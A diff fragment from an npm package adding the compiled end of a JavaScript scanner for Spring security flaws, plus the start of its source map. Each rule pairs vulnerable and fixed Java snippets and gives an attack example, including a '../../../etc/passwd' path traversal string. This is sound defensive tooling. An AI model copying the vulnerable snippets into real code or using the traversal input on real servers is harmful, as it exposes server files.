+ ], '@CrossOrigin(origins = "*")\n@RestController\npublic class ApiController {\n @GetMapping("/user/profile")\n public User getProfile() { return currentUser(); }\n}', '@CrossOrigin(\n origins = {"https://app.company.com", "https://admin.company.com"},\n allowCredentials = "true"\n)\n@RestController\npublic class ApiController {\n @GetMapping("/user/profile")\n public User getProfile() { return currentUser(); }\n}', 'Specify exact allowed origins. Never use * with credentials. Use environment-specific configuration for origins. Consider using Spring Security\'s CORS configuration for global settings'));
335
+ }
336
+ // 28. Path Traversal - HIGH
337
+ if (trimmed.includes('@PathVariable') &&
338
+ !trimmed.startsWith('//')) {
339
+ // Check next few lines for file operations
340
+ const nextLines = lines.slice(index + 1, Math.min(index + 10, lines.length));
341
+ const hasFileOperation = nextLines.some(l => l.match(/new\s+File\s*\(/) ||
342
+ l.includes('Files.read') ||
343
+ l.includes('Files.write') ||
344
+ l.includes('.readAllBytes') ||
345
+ l.includes('FileInputStream') ||
346
+ l.includes('FileOutputStream'));
347
+ if (hasFileOperation) {
348
+ vulnerabilities.push((0, createVulnerability_1.createJavaSecurityVulnerability)('spring-path-traversal', '@PathVariable used in file operations - Path Traversal vulnerability', 'Validate path: Use Path.normalize() and check .startsWith(baseDir)', lineNumber, '@PathVariable values come directly from the URL and can contain path traversal sequences (../, ../../) that allow attackers to escape the intended directory and access arbitrary files on the server, including configuration files, credentials, source code, or system files.', '@GetMapping("/files/{filename}") + filename="../../../etc/passwd" reads /etc/passwd', [
349
+ 'Arbitrary file read (credentials, configs)',
350
+ 'Source code disclosure',
351
+ 'System file access (/etc/passwd)',
352
+ 'Information disclosure',
353
+ 'Remote code execution (if write enabled)'
354
+ ], '@GetMapping("/files/{filename}")\npublic byte[] getFile(@PathVariable String filename) {\n return Files.readAllBytes(Paths.get("/uploads/" + filename)); // Vulnerable\n}', '@GetMapping("/files/{filename}")\npublic byte[] getFile(@PathVariable String filename) {\n Path baseDir = Paths.get("/uploads").toAbsolutePath().normalize();\n Path filePath = baseDir.resolve(filename).normalize();\n \n if (!filePath.startsWith(baseDir)) {\n throw new SecurityException("Path traversal detected");\n }\n \n return Files.readAllBytes(filePath); // Safe\n}', 'Normalize paths with .normalize(). Validate resolved path stays within base directory with .startsWith(). Reject paths containing .. or absolute paths. Use whitelist of allowed filenames if possible'));
355
+ }
356
+ }
357
+ // 29. Missing Rate Limiting - MEDIUM
358
+ if (trimmed.match(/@(PostMapping|RequestMapping)\s*\(/) &&
359
+ (trimmed.includes('/login') || trimmed.includes('/auth') || trimmed.includes('/signin')) &&
360
+ !trimmed.startsWith('//')) {
361
+ // Check both previous and next lines for rate limiting annotations (common libraries: Bucket4j, Resilience4j)
362
+ const prevLines = lines.slice(Math.max(0, index - 5), index);
363
+ const nextLines = lines.slice(index + 1, Math.min(index + 3, lines.length));
364
+ const allContext = [...prevLines, ...nextLines];
365
+ const hasRateLimit = allContext.some(l => l.includes('@RateLimiter') ||
366
+ l.includes('@RateLimit') ||
367
+ l.includes('@Bucket'));
368
+ if (!hasRateLimit) {
369
+ vulnerabilities.push((0, createVulnerability_1.createJavaSecurityVulnerability)('spring-missing-rate-limit', 'Authentication endpoint without rate limiting - Brute force risk', 'Add rate limiting: Use Bucket4j, Resilience4j, or Spring Security rate limiting', lineNumber, 'Authentication endpoints without rate limiting allow unlimited login attempts, enabling brute force attacks to guess passwords. Attackers can try thousands of password combinations, credential stuffing attacks using leaked password lists, or cause denial of service through excessive requests.', '/login without rate limiting → attacker tries 10,000 passwords → successful breach', [
370
+ 'Brute force password guessing',
371
+ 'Credential stuffing attacks',
372
+ 'Account takeover',
373
+ 'Denial of Service',
374
+ 'Resource exhaustion'
375
+ ], '@PostMapping("/login")\npublic ResponseEntity<AuthResponse> login(@RequestBody LoginRequest request) {\n return authService.authenticate(request); // No rate limiting\n}', '// Using Bucket4j\n@PostMapping("/login")\n@RateLimiter(name = "loginLimiter")\npublic ResponseEntity<AuthResponse> login(@RequestBody LoginRequest request) {\n return authService.authenticate(request);\n}\n\n// In application.yml\nresilience4j.ratelimiter:\n instances:\n loginLimiter:\n limitForPeriod: 5\n limitRefreshPeriod: 60s', 'Implement rate limiting on authentication endpoints (e.g., 5 attempts per minute per IP). Use Bucket4j, Resilience4j, or Spring Cloud Gateway rate limiting. Consider account lockout after repeated failures. Monitor for brute force patterns'));
376
+ }
377
+ }
378
+ // 30. Insecure Session Configuration - HIGH
379
+ if (trimmed.includes('@RestController')) {
380
+ // Check entire file for Spring Security config with stateless session
381
+ const hasStatelessSession = lines.some(l => l.includes('sessionCreationPolicy') &&
382
+ (l.includes('STATELESS') || l.includes('SessionCreationPolicy.STATELESS')));
383
+ if (!hasStatelessSession && lines.some(l => l.includes('HttpSecurity'))) {
384
+ vulnerabilities.push((0, createVulnerability_1.createJavaSecurityVulnerability)('spring-insecure-session', '@RestController without STATELESS session policy - Session fixation risk', 'Configure Spring Security: .sessionManagement().sessionCreationPolicy(SessionCreationPolicy.STATELESS)', lineNumber, 'REST APIs should use stateless authentication (JWT, OAuth tokens) instead of server-side sessions. Session-based authentication in REST APIs is vulnerable to session fixation, CSRF, and doesn\'t scale horizontally. Attackers can exploit session predictability or steal session cookies.', 'Session-based REST API vulnerable to session fixation attack → attacker forces victim to use known session ID', [
385
+ 'Session fixation attacks',
386
+ 'CSRF vulnerabilities',
387
+ 'Session hijacking',
388
+ 'Scalability issues',
389
+ 'Mobile app compatibility problems'
390
+ ], '@Configuration\n@EnableWebSecurity\npublic class SecurityConfig {\n protected void configure(HttpSecurity http) {\n http.authorizeRequests().anyRequest().authenticated();\n // Missing sessionCreationPolicy\n }\n}', '@Configuration\n@EnableWebSecurity\npublic class SecurityConfig {\n protected void configure(HttpSecurity http) {\n http\n .sessionManagement()\n .sessionCreationPolicy(SessionCreationPolicy.STATELESS)\n .and()\n .authorizeRequests().anyRequest().authenticated();\n }\n}', 'Use SessionCreationPolicy.STATELESS for REST APIs with JWT/OAuth. Disable session creation entirely. Use token-based authentication instead of server-side sessions for better security and scalability'));
391
+ }
392
+ }
393
+ });
394
+ return vulnerabilities;
395
+ }
396
+ //# sourceMappingURL=framework-security.js.map
package/dist/src/lib/analyzers/java/security-checks/framework-security.js.map ADDED
@@ -0,0 +1 @@
1
+ {"version":3,"file":"framework-security.js","sourceRoot":"","sources":["../../../../../../../../src/lib/analyzers/java/security-checks/framework-security.ts"],"names":[],"mappings":";AAAA;;;;;;;;;;;;;;GAcG;;AAaH,wDA0oBC;AAppBD,sEAA+E;AAC/E,8DAA0D;AAE1D;;;;;;GAMG;AACH,SAAgB,sBAAsB,CAAC,KAAe,EAAE,IAAY;IAClE,MAAM,eAAe,GAA4B,EAAE,CAAC;IACpD,IAAI,kBAAkB,GAAG,KAAK,CAAC;IAE/B,KAAK,CAAC,OAAO,CAAC,CAAC,IAAI,EAAE,KAAK,EAAE,EAAE;QAC5B,MAAM,UAAU,GAAG,KAAK,GAAG,CAAC,CAAC;QAC7B,MAAM,OAAO,GAAG,IAAI,CAAC,IAAI,EAAE,CAAC;QAE5B,wDAAwD;QACxD,IAAI,OAAO,CAAC,QAAQ,CAAC,IAAI,CAAC,EAAE,CAAC;YAC3B,kBAAkB,GAAG,IAAI,CAAC;QAC5B,CAAC;QACD,IAAI,OAAO,CAAC,QAAQ,CAAC,IAAI,CAAC,EAAE,CAAC;YAC3B,kBAAkB,GAAG,KAAK,CAAC;YAC3B,OAAO,CAAC,wBAAwB;QAClC,CAAC;QAED,+EAA+E;QAC/E,8DAA8D;QAC9D,IAAI,CAAC,OAAO;YACR,kBAAkB;YAClB,OAAO,CAAC,UAAU,CAAC,IAAI,CAAC,EAAE,CAAC;YAC7B,OAAO;QACT,CAAC;QAED,gFAAgF;QAEhF,qCAAqC;QACrC,IAAI,OAAO,CAAC,KAAK,CAAC,6DAA6D,CAAC,EAAE,CAAC;YACjF,MAAM,SAAS,GAAG,KAAK,CAAC,KAAK,CAAC,IAAI,CAAC,GAAG,CAAC,CAAC,EAAE,KAAK,GAAG,EAAE,CAAC,EAAE,KAAK,CAAC,CAAC;YAC9D,MAAM,SAAS,GAAG,KAAK,CAAC,KAAK,CAAC,KAAK,GAAG,CAAC,EAAE,IAAI,CAAC,GAAG,CAAC,KAAK,GAAG,EAAE,EAAE,KAAK,CAAC,MAAM,CAAC,CAAC,CAAC;YAC7E,MAAM,UAAU,GAAG,CAAC,GAAG,SAAS,EAAE,GAAG,SAAS,CAAC,CAAC;YAEhD,MAAM,eAAe,GAAG,UAAU,CAAC,IAAI,CAAC,CAAC,CAAC,EAAE,CAC1C,CAAC,CAAC,QAAQ,CAAC,oBAAoB,CAAC,IAAI,CAAC,CAAC,QAAQ,CAAC,kBAAkB,CAAC,CACnE,CAAC;YAEF,MAAM,YAAY,GAAG,UAAU,CAAC,IAAI,CAAC,CAAC,CAAC,EAAE,CACvC,CAAC,CAAC,QAAQ,CAAC,WAAW,CAAC,IAAI,CAAC,CAAC,QAAQ,CAAC,YAAY,CAAC,CACpD,CAAC;YAEF,IAAI,eAAe,IAAI,CAAC,YAAY,EAAE,CAAC;gBACrC,eAAe,CAAC,IAAI,CAAC,IAAA,qDAA+B,EAClD,qBAAqB,EACrB,iEAAiE,EACjE,iFAAiF,EACjF,UAAU,EACV,6TAA6T,EAC7T,wGAAwG,EACxG;oBACE,4BAA4B;oBAC5B,kBAAkB;oBAClB,4BAA4B;oBAC5B,iBAAiB;oBACjB,iCAAiC;iBAClC,EACD,2IAA2I,EAC3I,mSAAmS,EACnS,iNAAiN,CAClN,CAAC,CAAC;YACL,CAAC;QACH,CAAC;QAED,uCAAuC;QACvC,MAAM,oBAAoB,GAAG,OAAO,CAAC,KAAK,CAAC,qFAAqF,CAAC;YAC/H,CAAC,OAAO,CAAC,QAAQ,CAAC,QAAQ,CAAC,IAAI,OAAO,CAAC,QAAQ,CAAC,SAAS,CAAC,IAAI,OAAO,CAAC,QAAQ,CAAC,QAAQ,CAAC;gBACvF,OAAO,CAAC,QAAQ,CAAC,SAAS,CAAC,IAAI,OAAO,CAAC,QAAQ,CAAC,SAAS,CAAC,IAAI,OAAO,CAAC,QAAQ,CAAC,YAAY,CAAC;gBAC5F,OAAO,CAAC,QAAQ,CAAC,UAAU,CAAC,IAAI,OAAO,CAAC,QAAQ,CAAC,cAAc,CAAC,IAAI,OAAO,CAAC,QAAQ,CAAC,SAAS,CAAC,CAAC,CAAC;QAEpG,IAAI,oBAAoB,IAAI,CAAC,OAAO,CAAC,UAAU,CAAC,IAAI,CAAC,IAAI,CAAC,OAAO,CAAC,UAAU,CAAC,GAAG,CAAC,EAAE,CAAC;YAClF,MAAM,SAAS,GAAG,KAAK,CAAC,KAAK,CAAC,IAAI,CAAC,GAAG,CAAC,CAAC,EAAE,KAAK,GAAG,EAAE,CAAC,EAAE,KAAK,CAAC,CAAC;YAC9D,MAAM,OAAO,GAAG,SAAS,CAAC,IAAI,CAAC,CAAC,CAAC,EAAE;gBACjC,MAAM,EAAE,GAAG,CAAC,CAAC,IAAI,EAAE,CAAC;gBACpB,MAAM,QAAQ,GAAG,0BAAW,CAAC,kBAAkB,CAAC,CAAC,EAAE,MAAM,CAAC,CAAC;gBAC3D,OAAO,CAAC,EAAE,CAAC,UAAU,CAAC,IAAI,CAAC;oBACpB,CAAC,QAAQ,CAAC,QAAQ,CAAC,eAAe,CAAC;wBAClC,QAAQ,CAAC,QAAQ,CAAC,UAAU,CAAC;wBAC7B,QAAQ,CAAC,QAAQ,CAAC,eAAe,CAAC,CAAC,CAAC;YAC9C,CAAC,CAAC,CAAC;YAEH,IAAI,CAAC,OAAO,EAAE,CAAC;gBACb,eAAe,CAAC,IAAI,CAAC,IAAA,qDAA+B,EAClD,8BAA8B,EAC9B,iEAAiE,EACjE,mFAAmF,EACnF,UAAU,EACV,yPAAyP,EACzP,0FAA0F,EAC1F;oBACE,0BAA0B;oBAC1B,sBAAsB;oBACtB,aAAa;oBACb,kBAAkB;oBAClB,oCAAoC;iBACrC,EACD,8HAA8H,EAC9H,0KAA0K,EAC1K,sNAAsN,CACvN,CAAC,CAAC;YACL,CAAC;QACH,CAAC;QAED,2CAA2C;QAC3C,IAAI,CAAC,OAAO,CAAC,QAAQ,CAAC,eAAe,CAAC,IAAI,OAAO,CAAC,QAAQ,CAAC,iBAAiB,CAAC,CAAC;YAC1E,CAAC,OAAO,CAAC,UAAU,CAAC,IAAI,CAAC,IAAI,CAAC,OAAO,CAAC,UAAU,CAAC,IAAI,CAAC,IAAI,CAAC,OAAO,CAAC,UAAU,CAAC,GAAG,CAAC,EAAE,CAAC;YACvF,MAAM,SAAS,GAAG,KAAK,CAAC,KAAK,CAAC,IAAI,CAAC,GAAG,CAAC,CAAC,EAAE,KAAK,GAAG,CAAC,CAAC,EAAE,KAAK,CAAC,CAAC;YAC7D,MAAM,SAAS,GAAa,EAAE,CAAC;YAC/B,IAAI,UAAU,GAAG,CAAC,CAAC;YACnB,KAAK,IAAI,CAAC,GAAG,KAAK,GAAG,CAAC,EAAE,CAAC,GAAG,IAAI,CAAC,GAAG,CAAC,KAAK,GAAG,EAAE,EAAE,KAAK,CAAC,MAAM,CAAC,EAAE,CAAC,EAAE,EAAE,CAAC;gBACpE,MAAM,CAAC,GAAG,KAAK,CAAC,CAAC,CAAC,CAAC;gBACnB,KAAK,MAAM,IAAI,IAAI,CAAC,EAAE,CAAC;oBACrB,IAAI,IAAI,KAAK,GAAG;wBAAE,UAAU,EAAE,CAAC;oBAC/B,IAAI,IAAI,KAAK,GAAG;wBAAE,UAAU,EAAE,CAAC;gBACjC,CAAC;gBACD,SAAS,CAAC,IAAI,CAAC,CAAC,CAAC,CAAC;gBAClB,IAAI,UAAU,GAAG,CAAC,IAAI,CAAC,UAAU,KAAK,CAAC,IAAI,CAAC,CAAC,QAAQ,CAAC,GAAG,CAAC,CAAC,EAAE,CAAC;oBAC5D,MAAM;gBACR,CAAC;YACH,CAAC;YAED,MAAM,UAAU,GAAG,CAAC,GAAG,SAAS,EAAE,GAAG,SAAS,CAAC,CAAC;YAChD,MAAM,iBAAiB,GAAG,UAAU,CAAC,IAAI,CAAC,CAAC,CAAC,EAAE;gBAC5C,MAAM,EAAE,GAAG,CAAC,CAAC,IAAI,EAAE,CAAC;gBACpB,OAAO,CAAC,EAAE,CAAC,UAAU,CAAC,IAAI,CAAC;oBACpB,CAAC,CAAC,KAAK,CAAC,uEAAuE,CAAC,CAAC;YAC1F,CAAC,CAAC,CAAC;YAEH,MAAM,oBAAoB,GAAG,SAAS,CAAC,IAAI,CAAC,CAAC,CAAC,EAAE;gBAC9C,MAAM,EAAE,GAAG,CAAC,CAAC,IAAI,EAAE,CAAC;gBACpB,IAAI,EAAE,CAAC,UAAU,CAAC,IAAI,CAAC,IAAI,EAAE,CAAC,UAAU,CAAC,IAAI,CAAC;oBAAE,OAAO,KAAK,CAAC;gBAE7D,MAAM,SAAS,GAAG,EAAE,CAAC,KAAK,CAAC,WAAW,CAAC,CAAC;gBACxC,MAAM,UAAU,GAAG,EAAE,CAAC,KAAK,CAAC,oBAAoB,CAAC,CAAC;gBAClD,MAAM,gBAAgB,GAAG,EAAE,CAAC,QAAQ,CAAC,GAAG,CAAC,IAAI,EAAE,CAAC,QAAQ,CAAC,SAAS,CAAC,CAAC;gBACpE,MAAM,gBAAgB,GAAG,EAAE,CAAC,QAAQ,CAAC,GAAG,CAAC,IAAI,EAAE,CAAC,QAAQ,CAAC,GAAG,CAAC,CAAC;gBAE9D,OAAO,SAAS,IAAI,UAAU,IAAI,gBAAgB,IAAI,gBAAgB,CAAC;YACzE,CAAC,CAAC,CAAC;YAEH,IAAI,iBAAiB,IAAI,oBAAoB,EAAE,CAAC;gBAC9C,eAAe,CAAC,IAAI,CAAC,IAAA,qDAA+B,EAClD,yBAAyB,EACzB,kEAAkE,EAClE,0FAA0F,EAC1F,UAAU,EACV,qQAAqQ,EACrQ,iHAAiH,EACjH;oBACE,kCAAkC;oBAClC,+BAA+B;oBAC/B,kBAAkB;oBAClB,sBAAsB;oBACtB,kBAAkB;iBACnB,EACD,yJAAyJ,EACzJ,shBAAshB,EACthB,wLAAwL,CACzL,CAAC,CAAC;YACL,CAAC;QACH,CAAC;QAED,sCAAsC;QACtC,IAAI,OAAO,CAAC,KAAK,CAAC,2BAA2B,CAAC;YAC1C,CAAC,OAAO,CAAC,QAAQ,CAAC,QAAQ,CAAC;YAC3B,CAAC,OAAO,CAAC,UAAU,CAAC,IAAI,CAAC,EAAE,CAAC;YAC9B,eAAe,CAAC,IAAI,CAAC,IAAA,qDAA+B,EAClD,2BAA2B,EAC3B,wDAAwD,EACxD,4EAA4E,EAC5E,UAAU,EACV,oTAAoT,EACpT,gGAAgG,EAChG;gBACE,mCAAmC;gBACnC,uBAAuB;gBACvB,iBAAiB;gBACjB,wCAAwC;gBACxC,oBAAoB;aACrB,EACD,iIAAiI,EACjI,mUAAmU,EACnU,mMAAmM,CACpM,CAAC,CAAC;QACL,CAAC;QAED,6CAA6C;QAC7C,IAAI,OAAO,CAAC,QAAQ,CAAC,QAAQ,CAAC;YAC1B,CAAC,OAAO,CAAC,QAAQ,CAAC,GAAG,CAAC,IAAI,OAAO,CAAC,QAAQ,CAAC,QAAQ,CAAC,CAAC;YACrD,CAAC,OAAO,CAAC,UAAU,CAAC,IAAI,CAAC,EAAE,CAAC;YAC9B,eAAe,CAAC,IAAI,CAAC,IAAA,qDAA+B,EAClD,0BAA0B,EAC1B,gEAAgE,EAChE,gFAAgF,EAChF,UAAU,EACV,wRAAwR,EACxR,iHAAiH,EACjH;gBACE,0CAA0C;gBAC1C,uBAAuB;gBACvB,mBAAmB;gBACnB,kBAAkB;gBAClB,sBAAsB;aACvB,EACD,sHAAsH,EACtH,oOAAoO,EACpO,sMAAsM,CACvM,CAAC,CAAC;QACL,CAAC;QAED,sCAAsC;QACtC,qEAAqE;QACrE,2EAA2E;QAC3E,IAAI,OAAO,CAAC,KAAK,CAAC,iDAAiD,CAAC;YAChE,CAAC,OAAO,CAAC,UAAU,CAAC,IAAI,CAAC,EAAE,CAAC;YAE9B,uDAAuD;YACvD,MAAM,WAAW,GAAG,OAAO,CAAC,KAAK,CAAC,yBAAyB,CAAC;gBACxC,OAAO,CAAC,KAAK,CAAC,qBAAqB,CAAC;gBACpC,OAAO,CAAC,KAAK,CAAC,eAAe,CAAC,CAAC;YAEnD,IAAI,WAAW,EAAE,CAAC;gBAChB,OAAO,CAAC,sCAAsC;YAChD,CAAC;YAED,MAAM,SAAS,GAAG,KAAK,CAAC,KAAK,CAAC,IAAI,CAAC,GAAG,CAAC,CAAC,EAAE,KAAK,GAAG,CAAC,CAAC,EAAE,KAAK,CAAC,CAAC;YAC7D,MAAM,gBAAgB,GAAG,SAAS,CAAC,IAAI,CAAC,CAAC,CAAC,EAAE,CAC1C,CAAC,CAAC,QAAQ,CAAC,gBAAgB,CAAC,CAC7B,CAAC;YAEF,IAAI,CAAC,gBAAgB,EAAE,CAAC;gBACtB,eAAe,CAAC,IAAI,CAAC,IAAA,qDAA+B,EAClD,8BAA8B,EAC9B,iEAAiE,EACjE,kDAAkD,EAClD,UAAU,EACV,2TAA2T,EAC3T,oFAAoF,EACpF;oBACE,oBAAoB;oBACpB,sBAAsB;oBACtB,yBAAyB;oBACzB,0BAA0B;oBAC1B,gCAAgC;iBACjC,EACD,oJAAoJ,EACpJ,0KAA0K,EAC1K,+OAA+O,CAChP,CAAC,CAAC;YACL,CAAC;QACH,CAAC;QAED,2BAA2B;QAC3B,IAAI,OAAO,CAAC,QAAQ,CAAC,cAAc,CAAC;YAChC,CAAC,OAAO,CAAC,QAAQ,CAAC,GAAG,CAAC,IAAI,OAAO,CAAC,QAAQ,CAAC,KAAK,CAAC,CAAC;YAClD,CAAC,OAAO,CAAC,UAAU,CAAC,IAAI,CAAC,EAAE,CAAC;YAC9B,eAAe,CAAC,IAAI,CAAC,IAAA,qDAA+B,EAClD,sBAAsB,EACtB,oDAAoD,EACpD,+EAA+E,EAC/E,UAAU,EACV,mRAAmR,EACnR,yFAAyF,EACzF;gBACE,yBAAyB;gBACzB,mBAAmB;gBACnB,mBAAmB;gBACnB,gCAAgC;gBAChC,oBAAoB;aACrB,EACD,qKAAqK,EACrK,8PAA8P,EAC9P,2LAA2L,CAC5L,CAAC,CAAC;QACL,CAAC;QAED,4BAA4B;QAC5B,IAAI,OAAO,CAAC,QAAQ,CAAC,eAAe,CAAC;YACjC,CAAC,OAAO,CAAC,UAAU,CAAC,IAAI,CAAC,EAAE,CAAC;YAC9B,MAAM,SAAS,GAAG,KAAK,CAAC,KAAK,CAAC,KAAK,GAAG,CAAC,EAAE,IAAI,CAAC,GAAG,CAAC,KAAK,GAAG,EAAE,EAAE,KAAK,CAAC,MAAM,CAAC,CAAC,CAAC;YAC7E,MAAM,gBAAgB,GAAG,SAAS,CAAC,IAAI,CAAC,CAAC,CAAC,EAAE,CAC1C,CAAC,CAAC,KAAK,CAAC,iBAAiB,CAAC;gBAC1B,CAAC,CAAC,QAAQ,CAAC,YAAY,CAAC;gBACxB,CAAC,CAAC,QAAQ,CAAC,aAAa,CAAC;gBACzB,CAAC,CAAC,QAAQ,CAAC,eAAe,CAAC;gBAC3B,CAAC,CAAC,QAAQ,CAAC,iBAAiB,CAAC;gBAC7B,CAAC,CAAC,QAAQ,CAAC,kBAAkB,CAAC,CAC/B,CAAC;YAEF,IAAI,gBAAgB,EAAE,CAAC;gBACrB,eAAe,CAAC,IAAI,CAAC,IAAA,qDAA+B,EAClD,uBAAuB,EACvB,sEAAsE,EACtE,oEAAoE,EACpE,UAAU,EACV,kRAAkR,EAClR,qFAAqF,EACrF;oBACE,4CAA4C;oBAC5C,wBAAwB;oBACxB,kCAAkC;oBAClC,wBAAwB;oBACxB,0CAA0C;iBAC3C,EACD,4KAA4K,EAC5K,+XAA+X,EAC/X,wMAAwM,CACzM,CAAC,CAAC;YACL,CAAC;QACH,CAAC;QAED,qCAAqC;QACrC,IAAI,OAAO,CAAC,KAAK,CAAC,oCAAoC,CAAC;YACnD,CAAC,OAAO,CAAC,QAAQ,CAAC,QAAQ,CAAC,IAAI,OAAO,CAAC,QAAQ,CAAC,OAAO,CAAC,IAAI,OAAO,CAAC,QAAQ,CAAC,SAAS,CAAC,CAAC;YACxF,CAAC,OAAO,CAAC,UAAU,CAAC,IAAI,CAAC,EAAE,CAAC;YAC9B,MAAM,SAAS,GAAG,KAAK,CAAC,KAAK,CAAC,IAAI,CAAC,GAAG,CAAC,CAAC,EAAE,KAAK,GAAG,CAAC,CAAC,EAAE,KAAK,CAAC,CAAC;YAC7D,MAAM,SAAS,GAAG,KAAK,CAAC,KAAK,CAAC,KAAK,GAAG,CAAC,EAAE,IAAI,CAAC,GAAG,CAAC,KAAK,GAAG,CAAC,EAAE,KAAK,CAAC,MAAM,CAAC,CAAC,CAAC;YAC5E,MAAM,UAAU,GAAG,CAAC,GAAG,SAAS,EAAE,GAAG,SAAS,CAAC,CAAC;YAEhD,MAAM,YAAY,GAAG,UAAU,CAAC,IAAI,CAAC,CAAC,CAAC,EAAE,CACvC,CAAC,CAAC,QAAQ,CAAC,cAAc,CAAC;gBAC1B,CAAC,CAAC,QAAQ,CAAC,YAAY,CAAC;gBACxB,CAAC,CAAC,QAAQ,CAAC,SAAS,CAAC,CACtB,CAAC;YAEF,IAAI,CAAC,YAAY,EAAE,CAAC;gBAClB,eAAe,CAAC,IAAI,CAAC,IAAA,qDAA+B,EAClD,2BAA2B,EAC3B,kEAAkE,EAClE,iFAAiF,EACjF,UAAU,EACV,uSAAuS,EACvS,oFAAoF,EACpF;oBACE,+BAA+B;oBAC/B,6BAA6B;oBAC7B,kBAAkB;oBAClB,mBAAmB;oBACnB,qBAAqB;iBACtB,EACD,4KAA4K,EAC5K,6VAA6V,EAC7V,iPAAiP,CAClP,CAAC,CAAC;YACL,CAAC;QACH,CAAC;QAED,4CAA4C;QAC5C,IAAI,OAAO,CAAC,QAAQ,CAAC,iBAAiB,CAAC,EAAE,CAAC;YACxC,MAAM,mBAAmB,GAAG,KAAK,CAAC,IAAI,CAAC,CAAC,CAAC,EAAE,CACzC,CAAC,CAAC,QAAQ,CAAC,uBAAuB,CAAC;gBACnC,CAAC,CAAC,CAAC,QAAQ,CAAC,WAAW,CAAC,IAAI,CAAC,CAAC,QAAQ,CAAC,iCAAiC,CAAC,CAAC,CAC3E,CAAC;YAEF,IAAI,CAAC,mBAAmB,IAAI,KAAK,CAAC,IAAI,CAAC,CAAC,CAAC,EAAE,CAAC,CAAC,CAAC,QAAQ,CAAC,cAAc,CAAC,CAAC,EAAE,CAAC;gBACxE,eAAe,CAAC,IAAI,CAAC,IAAA,qDAA+B,EAClD,yBAAyB,EACzB,0EAA0E,EAC1E,wGAAwG,EACxG,UAAU,EACV,+RAA+R,EAC/R,+GAA+G,EAC/G;oBACE,0BAA0B;oBAC1B,sBAAsB;oBACtB,mBAAmB;oBACnB,oBAAoB;oBACpB,mCAAmC;iBACpC,EACD,8NAA8N,EAC9N,2SAA2S,EAC3S,yMAAyM,CAC1M,CAAC,CAAC;YACL,CAAC;QACH,CAAC;QAED,0EAA0E;QAE1E,0CAA0C;QAC1C,IAAI,OAAO,CAAC,KAAK,CAAC,sCAAsC,CAAC;YACrD,CAAC,OAAO,CAAC,UAAU,CAAC,IAAI,CAAC,EAAE,CAAC;YAC9B,eAAe,CAAC,IAAI,CAAC,IAAA,qDAA+B,EAClD,0BAA0B,EAC1B,2EAA2E,EAC3E,yEAAyE,EACzE,UAAU,EACV,gRAAgR,EAChR,mGAAmG,EACnG;gBACE,6BAA6B;gBAC7B,4BAA4B;gBAC5B,mBAAmB;gBACnB,uBAAuB;gBACvB,sBAAsB;aACvB,EACD,gFAAgF,EAChF,wNAAwN,EACxN,yLAAyL,CAC1L,CAAC,CAAC;QACL,CAAC;QAED,wCAAwC;QACxC,IAAI,OAAO,CAAC,KAAK,CAAC,kDAAkD,CAAC;YACjE,CAAC,OAAO,CAAC,UAAU,CAAC,IAAI,CAAC,EAAE,CAAC;YAC9B,MAAM,gBAAgB,GAAG,OAAO,CAAC,KAAK,CAAC,sEAAsE,CAAC,CAAC;YAE/G,IAAI,gBAAgB,EAAE,CAAC;gBACrB,eAAe,CAAC,IAAI,CAAC,IAAA,qDAA+B,EAClD,sBAAsB,EACtB,4DAA4D,EAC5D,yEAAyE,EACzE,UAAU,EACV,+WAA+W,EAC/W,mJAAmJ,EACnJ;oBACE,2CAA2C;oBAC3C,4BAA4B;oBAC5B,oCAAoC;oBACpC,6BAA6B;oBAC7B,oCAAoC;iBACrC,EACD,iGAAiG,EACjG,kPAAkP,EAClP,wMAAwM,CACzM,CAAC,CAAC;YACL,CAAC;QACH,CAAC;QAED,+CAA+C;QAC/C,IAAI,OAAO,CAAC,KAAK,CAAC,kDAAkD,CAAC;YACjE,CAAC,OAAO,CAAC,UAAU,CAAC,IAAI,CAAC,EAAE,CAAC;YAC9B,eAAe,CAAC,IAAI,CAAC,IAAA,qDAA+B,EAClD,oBAAoB,EACpB,2EAA2E,EAC3E,oFAAoF,EACpF,UAAU,EACV,uPAAuP,EACvP,oGAAoG,EACpG;gBACE,gDAAgD;gBAChD,6BAA6B;gBAC7B,6BAA6B;gBAC7B,+BAA+B;gBAC/B,0BAA0B;aAC3B,EACD,8HAA8H,EAC9H,uNAAuN,EACvN,4LAA4L,CAC7L,CAAC,CAAC;QACL,CAAC;QAED,sDAAsD;QACtD,IAAI,OAAO,CAAC,KAAK,CAAC,sCAAsC,CAAC;YACrD,CAAC,IAAI,CAAC,QAAQ,CAAC,oBAAoB,CAAC;YACpC,CAAC,IAAI,CAAC,QAAQ,CAAC,2BAA2B,CAAC;YAC3C,CAAC,OAAO,CAAC,UAAU,CAAC,IAAI,CAAC,EAAE,CAAC;YAC9B,MAAM,aAAa,GAAG,KAAK,CAAC,KAAK,CAAC,CAAC,EAAE,KAAK,CAAC,CAAC,KAAK,CAAC,CAAC,CAAC,EAAE,CACpD,CAAC,CAAC,CAAC,KAAK,CAAC,sCAAsC,CAAC,CACjD,CAAC;YAEF,IAAI,aAAa,EAAE,CAAC;gBAClB,eAAe,CAAC,IAAI,CAAC,IAAA,qDAA+B,EAClD,0BAA0B,EAC1B,iFAAiF,EACjF,kEAAkE,EAClE,UAAU,EACV,oRAAoR,EACpR,2FAA2F,EAC3F;oBACE,0CAA0C;oBAC1C,kCAAkC;oBAClC,uBAAuB;oBACvB,kCAAkC;oBAClC,uBAAuB;iBACxB,EACD,yFAAyF,EACzF,iTAAiT,EACjT,qMAAqM,CACtM,CAAC,CAAC;YACL,CAAC;QACH,CAAC;QAED,4DAA4D;QAE5D,mDAAmD;QACnD,IAAI,OAAO,CAAC,KAAK,CAAC,2DAA2D,CAAC;YAC1E,CAAC,OAAO,CAAC,UAAU,CAAC,IAAI,CAAC,IAAI,CAAC,OAAO,CAAC,UAAU,CAAC,IAAI,CAAC,IAAI,CAAC,OAAO,CAAC,UAAU,CAAC,GAAG,CAAC,EAAE,CAAC;YACvF,MAAM,SAAS,GAAG,KAAK,CAAC,KAAK,CAAC,IAAI,CAAC,GAAG,CAAC,CAAC,EAAE,KAAK,GAAG,EAAE,CAAC,EAAE,KAAK,CAAC,CAAC;YAC9D,MAAM,SAAS,GAAG,KAAK,CAAC,KAAK,CAAC,KAAK,GAAG,CAAC,EAAE,IAAI,CAAC,GAAG,CAAC,KAAK,GAAG,EAAE,EAAE,KAAK,CAAC,MAAM,CAAC,CAAC,CAAC;YAC7E,MAAM,UAAU,GAAG,CAAC,GAAG,SAAS,EAAE,IAAI,EAAE,GAAG,SAAS,CAAC,CAAC;YAEtD,MAAM,aAAa,GAAG,UAAU,CAAC,IAAI